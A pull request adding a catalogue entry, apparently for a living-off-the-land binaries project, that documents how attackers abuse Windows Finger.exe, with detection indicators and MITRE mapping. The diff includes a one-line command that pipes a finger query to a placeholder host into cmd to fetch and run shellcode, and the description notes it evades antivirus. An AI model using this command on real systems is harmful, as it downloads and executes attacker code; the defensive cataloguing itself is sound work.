### PR TITLE
Create Finger.exe

### DIFF
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@@ -1,0 +1,28 @@
+Name: Finger.exe
+Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
+Author: Ruben Revuelta
+Created: 2021-08-30
+Commands:
+  - Command: finger user@example.host.com | more +2 | cmd
+    Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.
+    Usecase: Download malicious shellcode from Command & Control server.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105
+    OperatingSystem: From Windows Server 2008 and Windows 8
+Full_Path:
+  - Path: c:\windows\system32\finger.exe
+  - Path: c:\windows\syswow64\finger.exe
+Code_Sample: 
+  - Code:
+Detection: 
+  - IOC: finger.exe spawn is not common in client systems.
+  - IOC: finger.exe connecting to external resources.
+Resources:
+  - Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
+Acknowledgement:
+  - Person: Ruben Revuelta (MAPFRE CERT)
+    Handle: @rubn_RB
+  - Person: Jose A. Jimenez (MAPFRE CERT)
+    Handle: @Ocelotty6669


### PR DESCRIPTION
Seen in early stages of infection processes in phishing campaigns. Threat actors connect to external domain asking for a fake user but downloading a malicious shellcode instead of the user information. This shellcode is later executed through CMD process. 

It is a stealthy way to connect to the C2 server as it is not detected by AV or EDR engines at this moment.